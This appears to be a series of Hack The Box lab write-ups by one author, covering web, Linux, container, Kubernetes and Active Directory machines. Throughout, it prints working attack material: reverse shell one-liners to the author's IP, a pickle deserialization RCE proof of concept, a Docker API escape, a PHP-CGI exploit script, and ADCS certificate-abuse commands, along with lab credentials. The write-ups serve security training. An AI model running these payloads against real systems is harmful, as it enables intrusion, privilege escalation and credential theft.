This binary is owned and run as root so we could try and abuse it. I tried the following yaml file:

name: x
description: x
image: x
price: 1
rule_msg: x
rule: "system('id'); return false;"

Using the system() command was seen as "illegal".

I could find that all the php shell commands were blacklisted in the /opt/gavel/.config/php/php.ini file:

This meant I'd need to use gavel-util to write a malicious rule as follows and execute it:

name: "Test"
description: "Testing test"
image: "https://sample.website"
price: 10000
rule_msg: "Your bid must be 20% higher than the previous bid"
rule: "file_put_contents('/opt/gavel/.config/php/php.ini', ''); return false;"

Now that the file was overwritten I verified whether it executed correctly:

Empty, good! Now it was time to give myself a root reverse shell:

name: "Test"
description: "Testing test"
image: "https://sample.website"
price: 10000
rule_msg: "Your bid must be 20% higher than the previous bid"
rule: "return system('busybox nc 10.10.14.14 80 -e bash');"

root.txt

</PasswordProtect>

HTB-Broken Shell

Maxim Andrei Koltypin — Tue, 02 Dec 2025 00:00:00 GMT

Scope:
94.237.49.88:39366

I was able to easily connect to the service using nc -vn:

Here I noticed that the following characters were whitelisted, and that they did not contain any letters.

[*] Allowed characters: ^[0-9${}/?"[:space:]:&>_=()]+$

This meant I'd need to think outside of the box with my enumeration, for example:

Regular commands such as ls -la will not work.

Since I want to enumerate the current working directory I can use this blog post to find useful bash commands that don't involve letters.

I tried the above but found the following error:

If we try to execute the above command, the shell expands it to every matching file (like /bin/cp, /bin/ls, /bin/rm) and tries to run the first one with the others as arguments. After some testing I found that the /bin/ls binary was in 7th which meant I could use the following command to execute it:

_(){ $7& } && _ /???/??

Accordingly I found that the /bin/cat command was 3rd, meaning I could execute it along with the ? wildcard operator for the duration of the flag file:

_(){ $3 ???????????????????& } && _ /???/???

HTB-Flagportation

Maxim Andrei Koltypin — Fri, 05 Dec 2025 00:00:00 GMT

Scope:
83.136.251.105:45901

I connected initially via nc to see the standard output:

Reviewing the source code I saw the following:

I solved the challenge by directly reversing the teleportation logic implemented in the service. Each qubit encodes two bits using a fixed mapping, and the protocol leaks the correction information through the first two Z-basis measurements.

Once I understood how the CNOT and Hadamard operations transform the state, it became clear that the values of m0 and m1 uniquely determine the Pauli correction the server expects the client to apply before the final measurement. By replaying the exact inverse corrections (Z or X on qubit 2), choosing the same basis the state was originally prepared in, and reading the resulting measurement, I can reconstruct each transmitted bit-pair deterministically. For this I used the following script.py script:

from pwn import *

HOST, PORT = "83.136.251.105", 45901
r = remote(HOST, PORT)
bits = []

try:
    while True:
        r.recvuntil(b"Basis : ")
        basis = r.recvline().strip().decode()

        m0 = int(r.recvline().split()[-1])
        m1 = int(r.recvline().split()[-1])

        # (m0,m1) → instruction map
        instr = {
            (0,0): "Z:2;Z:2",
            (1,0): "Z:2",
            (0,1): "X:2",
            (1,1): "Z:2;X:2"
        }[(m0, m1)]

        r.sendlineafter(b"Specify the instructions : ", instr)
        r.sendlineafter(b"Specify the measurement basis : ", basis)

        final = int(r.recvline().split()[-1])
        bits.append(("0" if basis == "Z" else "1") + str(final))

except EOFError:
    b = ''.join(bits)
    flag = int(b, 2).to_bytes((len(b)+7)//8, "big")
    try: print("FLAG:", flag.decode())
    except: print("FLAG:", flag)
finally:
    r.close()

Iterating this for the whole dump and converting the recovered bitstream back to bytes yields the flag.

HTB-MonitorsFour

Maxim Andrei Koltypin — Sat, 06 Dec 2025 00:00:00 GMT

import PasswordProtect from '~/components/PasswordProtect.client';

Scope:
10.10.11.98

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv monitorsfour.htb

PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET
|_http-title: MonitorsFour - Networking Solutions
|_http-favicon: Unknown favicon MD5: 889DCABDC39A9126364F6A675AA4167D
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
5985/tcp open  http    syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

80/TCP - HTTP

gobuster

In order to enumerate the directories I used gobuster. Amongst the finds was the .env file which I looked into:

These credentials did not work for the login, and I tried password spraying with no luck.

I had also enumerated the /api endpoint:

I then added the token and got this output:

Accordingly I added an id and got this output:

This meant I could automate and brute force the id's using ffuf.

ffuf

ffuf -w <(seq 0 100) -u 'http://monitorsfour.htb/api/v1/user?token=0&id=FUZZ' -fr 'No user'

I then enumerated all the id's in a json output:

for i in 6 11 10 7 2; do curl -s "http://monitorsfour.htb/api/v1/user?token=0&id=$i" | jq .; done

I went ahead and cracked the passwords:

the valid match we were looking for was:

admin
wonderful1

I used this credential set to log in:

Nothing was found useful here, moving on.

cacti.monitorsfour.htb

During my enumeration I had found the cacti.monitorsfour.htb vhost and added it to my hosts list.

I tried password spraying some of the cracked combinations:

While admin didn't work I tried the first name of the admin user which was marcus:

This gave me full access!

Foothold

CVE-2025-24367

Using this publicly available PoC I went ahead and got a reverse shell on the server:

user.txt

Right away I noticed we landed inside of a docker container instead of the actual target.

Enumeration

In order to transfer over files I used the following commands:

export RHOST=10.10.14.9
export RPORT=80
export LFILE=linpeas.sh
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

During the enumeration I found the following:

cactiuser
7pyrf6ly8qx4

I didn't find anything super useful here so instead checked the /etc/resolv.conf file in order to find out what the internal interface of the docker host is:

docker

Since we know we're inside a docker container, and we know what the external host IP is we can use the following techniques to enumerate the port:

I then used the following command to enumerate the docker instance running:

curl -s http://192.168.65.7:2375/images/json | sed 's/},{/},\n{/g' | sed 's/,/\n  /g'

Privilege Escalation

Docker API Escape - CVE-2025-9074

I started doing some enumeration about the docker api and how I could escape it and found the following:

I then checked this website for useful Docker API commands:

The following steps will have to done in order to get a successfull reverse shell:

Create Container

Create a json file which will create the container:

{
  "Image": "docker_setup-nginx-php:latest",
  "Cmd": ["bash","-c","bash -i >& /dev/tcp/10.10.14.9/80 0>&1"],
  "HostConfig": {
    "Binds": ["/mnt/host/c:/host_root"]
  }
}

Create the container:

curl -s -H "Content-Type: application/json" \
  -d @create_container.json \
  http://192.168.65.7:2375/containers/create > resp.json

Check the response file, use this as the id to start the container:

response:

2f2764e2948cbc1ebe3aa5a20458d381e0f975d7d6dc9047ad1811f360120288

curl -s -X POST http://192.168.65.7:2375/containers/2f2764e2948cbc1ebe3aa5a20458d381e0f975d7d6dc9047ad1811f360120288/start

Check listener:

Once we have a successfull container we can go ahead and read the Windows file system:

root.txt

The root flag is found in the Administrator's desktop as always:

Docker CLI - Alternative Priv Esc

Instead of sending curl commands to the docker API we can also leverage ligolo to set up a tunnel, then use docker cli commands from our own host. I downloaded over ligolo to the target and ran the agent:

export RHOST=10.10.14.9
export RPORT=8000
export LFILE=agent
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Accordingly we set up the ligolo tunnel to the external interface and we can now get to work.

I used the following commands to create a container and use the image:

docker context create monitors --docer "host=tcp://192.168.65.7:2375"

Then used these commands to check whether the the container and image were up and running:

docker ps
docker images

And lastly ran the image in "opsec" mode (--rm):

docker run -it --rm -v /:/mnt alpine sh

Hereafter I was able to view the contents of the filesystem:

</PasswordProtect>

HTB-HackNet

Maxim Andrei Koltypin — Tue, 23 Dec 2025 00:00:00 GMT

Scope:
10.10.11.85

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv hacknet.htb

PORT      STATE    SERVICE REASON      VERSION
22/tcp    open     ssh     syn-ack     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 95:62:ef:97:31:82:ff:a1:c6:08:01:8c:6a:0f:dc:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ8BFa2rPKTgVLDq1GN85n/cGWndJ63dTBCsAS6v3n8j85AwatuF1UE+C95eEdeMPbZ1t26HrjltEg2Dj+1A2DM=
|   256 5f:bd:93:10:20:70:e6:09:f1:ba:6a:43:58:86:42:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFOSA3zBloIJP6JRvvREkPtPv013BYN+NNzn3kcJj0cH
80/tcp    open     http    syn-ack     nginx 1.22.1
|_http-title: HackNet - social network for hackers
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: B89198D9BEDA866B6ADC1D0CD9ECAEB6
|_http-server-header: nginx/1.22.1

80/TCP - HTTP

I went ahead and registered a new account:

I started looking around in the Search tab where I found that some users had private profiles:

And some didn't:

We can test out the like as well as the comment functionality:

Apparently we need to add people first before we can comment:

Inside caido I viewed the /likes route where I found that this showed all the profile pictures of the people that like the post:

I can also clearly see their username inside the title tag:

SSTI

:::note Since the usernames are shown inside the title tag I can attempt SSTI by using the {{ users }} variable in order to dump all the usernames. :::

Now I went ahead and tried testing out the following

This time around the app dumped the complete QuerySet which appears to be all users who liked this post.

Moving on from here I would like to find out what the SocialUser object consists of. For this I'll use the following:

{{ users.values }}

This time around it dumps the following variables:

id
email
username
password
picture
about
contact_requests
unread_messages
is_public
is_hidden
two_fa

Having found this info we can start automating the next steps in order to quickly dump only the necessary information about all users.

import re, html, requests

U = "http://hacknet.htb"
H = {
    "Cookie": "csrftoken=pWsK8Xea5pzMvqUDjABzeW1dhif4nS8R; sessionid=a70tgjtj5w59pwst7y1n7n2dz5ziqv7s", # Change these variables
    "User-Agent": "Mozilla/5.0"
}

out = set()

for i in range(1, 31):
    requests.get(f"{U}/like/{i}", headers=H)
    r = requests.get(f"{U}/likes/{i}", headers=H).text

    imgs = re.findall(r'title="([^"]+)"', r)
    if not imgs:
        continue

    q = html.unescape(imgs[-1])

    if "<QuerySet" not in q:
        requests.get(f"{U}/like/{i}", headers=H)
        r = requests.get(f"{U}/likes/{i}", headers=H).text
        imgs = re.findall(r'title="([^"]+)"', r)
        if not imgs:
            continue
        q = html.unescape(imgs[-1])

    for e, p in zip(
        re.findall(r"'email': '([^']*)'", q),
        re.findall(r"'password': '([^']*)'", q)
    ):
        out.add(f"{e.split('@')[0]}:{p}")

with open("creds.txt", "w") as f:
    for line in sorted(out):
        f.write(line + "\n")

print("\n===== * Found Users * =====\n")
print("\n".join(sorted(out)))
print("\n[+] Saved to creds.txt")

22/TCP - SSH

hydra

We can now attempt a brute force using the combination file that our script created:

hydra -C creds.txt ssh://hacknet.htb

Foothold

Shell as mikey

Using the correct credentials I logged in:

user.txt

It was here I could snatch the user flag right away:

Lateral Movement

Django Cache Deserialization attack

Accordingly I went on to enumerate the system, where I started off with the web root:

Inside the views.py file I found strong evidence that the target could be vulnerable to a Django Cache Deserialization attack.

I then found out that the django_cache directory is owned by sandy.

I can write the following poc in order to get myself a reverse shell as sandy:

import pickle
import base64

# Exploit object
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, (f'bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"',),)

payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload)

After heading over to /explore a new set of django cache files are created:

Since I can't simply overwrite the files I'll have to get creative:

Using the following regex however we can overwrite the files and make them executable:

for i in $(ls); do rm -f $i; echo 'gASVTAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDFiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQzIDA+JjEilIWUUpQu' | base64 -d > $i; chmod +x $i; done

Shell as sandy

Now when we refresh the web page again the exploit fires and we get a reverse shell:

I headed over to the home directory and started enumerating

Inside the .gnupg directory some private keys were found:

Privilege Escalation

gnupg keys

We can easily decrypt it as follows:

cp -r .gnupg/ /tmp/gnupg
chmod -R 700 /tmp/gnupg/
gpg --homedir /tmp/gnupg/ --list-secret-keys

I will then download over the armored_key.asc key to decrypt it using john.

We get an instant result:

sweetheart

Next up I will use the following:

gpg --import armored_key.asc
gpg --output backup02.sql --decrypt /var/www/HackNet/backups/backup02.sql.gpg

Now we can view the contents of the file.

While scrolling through the backup we find an interesting find:

h4ck3rs4re3veRywh3re99

Logging in as root

root.txt

HTB-Giveback

Maxim Andrei Koltypin — Wed, 24 Dec 2025 00:00:00 GMT

Scope:
10.10.11.94

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv giveback.htb

PORT      STATE    SERVICE      REASON      VERSION
22/tcp    open     ssh          syn-ack     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http         syn-ack     nginx 1.28.0
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST &#8211; OBVI
|_http-generator: WordPress 6.8.1
30686/tcp open     http         syn-ack     Golang net/http server
|_http-favicon: Unknown favicon MD5: 078C07D5669A42740EF813D5300EBA4D
|_http-title: Site doesn't have a title (application/json).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 24 Dec 2025 11:40:52 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|     "serviceProxyHealthy": true
|   GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 24 Dec 2025 11:40:37 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|_    "serviceProxyHealthy": true

wpscan

I noticed that port 80 was running on WordPress so I ran a wpscan right away:

Here I found an outdated plugin:

Looking around on the internet I find publicly available PoC's for this version:

Exploitation

CVE-2024-5932

I went ahead and cloned the repo:

git clone https://github.com/EQSTLab/CVE-2024-5932.git
cd CVE-2024-5932

In order to run the exploit we'll need a valid URL which leads to the Donation functionality:

python CVE-2024-5932-rce.py -u <URL_TO_EXPLOIT(Donation Form URL)> -c <COMMAND_TO_EXECUTE>

I then used the above URL in combination with a reverse shell command:

python3 CVE-2024-5932-rce.py -u 'http://giveback.htb/donations/the-things-we-need/' -c "bash -c 'bash -i >& /dev/tcp/10.10.14.9/443 0>&1'"

This returned a callback on my listener:

It seems we got a shell as root judging from the output of the id command? However on closer inspection it just appears that we've landed inside a container instead.

Container Priv Esc

env enumeration

I enumerated the environment variables in order to find out more about the target and found some interesting stuff:

sW5sp4spa3u7RLyetrekE4oS

O8F7KR5zGi

Further down I found the following:

This appears to be some sort of legacy service on port 5000. Since it's in the env variables we should be able to reach it using the following command:

php -r "echo file_get_contents('http://10.43.2.241:5000/');"

CVE-2024-4577

Apparently there's a CVE for this exact vulnerability:

For this we can set up the following script to exploit this:

<?php
// Reverse shell payload (same as the one-liner)
$payload = 'rm /tmp/shell;mkfifo /tmp/shell;cat /tmp/shell|sh -i 2>&1|nc 10.10.14.9 4444 > /tmp/shell';

// Target URL
$url = 'http://legacy-intranet-service:5000/cgi-bin/php-cgi?--define+allow_url_include=on+--define+auto_prepend_file=php://input';

// HTTP context
$options = [
    'http' => [
        'method'  => 'POST',
        'header'  => "Content-Type: application/x-www-form-urlencoded",
        'content' => $payload,
        'timeout' => 4
    ]
];

$context = stream_context_create($options);

// Send request
$response = @file_get_contents($url, false, $context);

// Output handling (same behavior as original)
if ($response !== false) {
    echo substr($response, 0, 5000);
}
?>

Once the script fired I could switch over to my other session where it appears I got root access:

Kubernetes Cluster Enumeration

We can start off by checking out the following directory:

Accordingly we can set the token as a new variable:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

Once done we will be using this token to enumerate the api.

curl -k -H "Authorization: Bearer $TOKEN" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api/v1/namespaces/default/secrets

This gives us an absolutely ENORMOUS output but the most important is the following:

Foothold

Shell as babywyrm

babywyrm
Qoq0jm4sCx8f7D2yysg7f4DJPwKeuH9

After base64 decoding the password we can go ahead and log in with these credentials:

user.txt

Privilege Escalation

debug

I checked out my sudo privileges and found the following:

In order to run this binary we'll need 2 passwords:

babywyrm ssh pass
mariadb admin pass (from env)

# babywyrm pass
Qoq0jm4sCx8f7D2yysg7f4DJPwKeuH9

# mariadb pass
sW5sp4spa3u7RLyetrekE4oS

I then tried out the run command and noticed the following:

It seems the config.json file is missing, which might be a prime opportunity to write one ourselves.

{
    "ociVersion": "1.0.0",
    "process": {
        "terminal": false,
        "user": {"uid": 0, "gid": 0},
        "args": ["/bin/bash", "-i"],
        "cwd": "/",
        "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
    },
    "root": {"path": "/"},
    "linux": {
        "namespaces": [
            {"type": "pid"},
            {"type": "network"}
        ]
    }
}

Next we create the rootfs directory inside the /tmp directory:

mkdir rootfs

Now we go ahead and run it to instantly get an interactive shell:

root.txt

HTB-EscapeTwo

Maxim Andrei Koltypin — Fri, 23 Jan 2026 00:00:00 GMT

Scope:
10.129.232.128

Creds:
rose
KxEPkKe6R8su

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv escapetwo.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-23 18:32:32Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-23T18:34:02+00:00; -13s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-23T18:34:02+00:00; -13s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49693/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack Microsoft Windows RPC
49710/tcp open  msrpc         syn-ack Microsoft Windows RPC
49726/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Enum4linux-ng

Using the enum4linux-ng tool I was able to enumerate the following information:

Scrolling further down I found all the users present on the system:

I was also able to read through some shares on the system:

Luckily for me (as usually in CTF's) there's no password lockout set to prevent password spraying:

nxc

Continuing on I ran nxc and found some kerberoastable users:

ca_svc
sql_svc

Unfortunately I was unable to crack these:

smbclient

Using smbclient I went ahead and logged into some of the shares to enumerate those further:

I downloaded the present files and checked them out.

These appeared to be corrupted however:

hexdump

By running hexdump I noticed that the first magic bytes is the following:

If we are to believe this AI overview this points to an archive file instead of a xlsx file.

hexeditor

It appears the magic bytes got corrupted and should be fixed:

After editing the file it shows up correctly:

Now that the bytes have been fixed we can view the contents of the file:

By using password spraying methods we can get the following valid info:

MSSQL

But more importantly:

Foothold

Shell as sql_svc

Using these rights we can give ourselves a reverse shell:

From here I enumerated the local users:

Nothing interesting there, so I checked out the C:\ directory:

Inside we find another password that we hadn't found yet:

However when spraying the passwords I discovered that the ryan user also used this password:

BloodHound

I continued enumeration using bloodhound:

WriteOwner

Here I noticed that ryan has the WriteOwner rights over the ca_svc user which can be exploited as follows:

impacket-owneredit -action write -new-owner ryan -target-dn "CN=CERTIFICATION AUTHORITY,CN=USERS,DC=SEQUEL,DC=HTB" sequel.htb/ryan:'WqSZAF6CysDQbGb3'

Alternatively this can also be done using bloodyAD:

bloodyAD --host 10.129.232.128  -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan

Accordingly we can force change the password for the ca_svc service account. This can yet again be done in multiple ways as seen below:

Using impacket tool suite

impacket-dacledit -action write -rights FullControl -principal ryan -target-dn "CN=CERTIFICATION AUTHORITY,CN=USERS,DC=SEQUEL,DC=HTB" sequel.htb/ryan:'WqSZAF6CysDQbGb3'

Using bloodyAD

bloodyAD --host 10.129.232.128  -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' set password ca_svc 'P@ssword123!'

Privilege Escalation

ADCS - ESC4

Since the service account is a specific Certification Authority account I checked out whether any ADCS vulns were present using certipy-ad:

It turns out that the system is vulnerable to ESC4 where the specific template name is the following:

Accordingly we will be issuing the following:

certipy-ad template -u ca_svc@sequel.htb -p 'P@ssword123!' -template "DunderMifflinAuthentication" -dc-ip 10.129.232.128 -write-default-configuration

ADCS - ESC1

Now that configuration is reverted to default ESC1 is now possible to exploit:

This can be done as follows:

certipy-ad req -username ca_svc@sequel.htb -p 'P@ssword123!' -ca sequel-DC01-CA -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -upn Administrator@sequel.htb -sid 'S-1-5-21-548670397-972687484-3496335370-500'

From here I was able to change the password and log in as the Administrator:

certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.232.128 -ldap-shell

Shell as Administrator

user.txt

root.txt

HTB-Escape

Maxim Andrei Koltypin — Sat, 24 Jan 2026 00:00:00 GMT

Scope:
10.129.228.253

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn -T5 -vvvv escape.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-01-24 16:18:45Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-24T16:20:13+00:00; +7h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
|_ssl-date: 2026-01-24T16:20:14+00:00; +7h59m48s from scanner time.
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.129.228.253:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.129.228.253:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-24T16:20:14+00:00; +7h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49702/tcp open  msrpc         syn-ack Microsoft Windows RPC
49713/tcp open  msrpc         syn-ack Microsoft Windows RPC
49740/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29662/tcp): CLEAN (Timeout)
|   Check 2 (port 16305/tcp): CLEAN (Timeout)
|   Check 3 (port 12096/udp): CLEAN (Timeout)
|   Check 4 (port 48343/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 7h59m47s, deviation: 0s, median: 7h59m47s
| smb2-time: 
|   date: 2026-01-24T16:19:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

kerbrute

Using kerbrute I was able to find the following service accounts present:

I reran kerbrute a couple times to check for usernames but wasn't able to get any hits, instead I ran enum4linux-ng as the guest user:

enum4linux-ng

The following info was found:

The Public share appears to be readable.

I downloaded the file and checked out the contents:

And there was also a Bonus tab heading:

PublicUser
GuestUserCantWrite1

nxc

It appeared that this user was still valid:

Using this user I was able to enumerate other domain users:

mssql_coerce

Using the following commands I was then able to coerce the sql_svc account into authenticating to our host:

In responder I saw the following pop up:

I then proceeded to crack it using hashcat:

sql_svc
REGGIE1234ronnie

Moving on I enumerated whether this user had any specific rights on the mssql server but I didn't manage to find anything useful:

Instead I sprayed the passwords against the other services and noticed I could log into winrm with this user.

Foothold

Shell as sql_svc

I did not notice anything interesting inside my home directory but did notice the SQLServer directory under C:\:

Cleartext Credentials

I then checked out the error log inside the Logs directory where I found something:

It appears that a user, perhaps ryan, tried to log in with their password instead of their username. Let's check our suspicions.

While they didn't seem to be very useful for mssql, they also worked for winrm:

Lateral Movement to ryan.cooper

user.txt

Privilege Escalation

ADCS - ESC1

Using ryan's credentials I enumerated the target with certipy-ad which displayed the target being vulnerable to ESC1:

certipy-ad find -u 'ryan.cooper@sequel.htb' -p 'NuclearMosquito3' -dc-ip 10.129.228.253 -stdout -vulnerable

In order to exploit this vulnerability I used the following command:

certipy-ad req -username ryan.cooper@sequel.htb -p 'NuclearMosquito3' -ca sequel-DC-CA -template UserAuthentication -dc-ip 10.129.228.253 -upn Administrator@sequel.htb

Next up I authenticated as the Administrator, changed their password via ldap-shell and logged in:

root.txt

Addendum

This box was also my 100th rooted machine on HTB:

HTB-Certified

Maxim Andrei Koltypin — Sat, 24 Jan 2026 00:00:00 GMT

Scope:
10.129.231.186

Creds:
judith.mader 
judith09
